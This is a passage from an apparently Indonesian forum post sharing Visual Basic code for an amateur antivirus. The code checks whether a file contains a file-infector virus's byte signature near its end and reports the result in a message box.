If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "µí§¶ýÚÿ×Ðþÿÿ·hþÿÿÿÿÿï¡ùÿÿÿÿÿÿÿÿÿÿÿÿ") > (GedeFileNya - 40970) Then
        CekSiAlmanB = True
    Else
        CekSiAlmanB = False
    End If
Else
    CekSiAlmanB = False
End If
End Function

Private Function MariMembaca(Targetnya As String) As String
Static sTemp As String
Open Targetnya For Binary As #1
    sTemp = Space(LOF(1))
    Get #1, , sTemp
Close #1
MariMembaca = sTemp
End Function

lalu pada command buttonnya masukan text ini
MsgBox "Positif Terinfeksi : " & CekSiAlman(Text1.Text), vbExclamation, "Hasil"

semoga thread ini berguna bagi agan" yang sedang mengembangkan antivirus,supaya antivirus agan bisa mendeteksi file" virus infector..

kl temen2 belum paham..dan males utak atik program Vb bisa langsut sedot aja gan.. monggo 



Thx for HM-TEAM..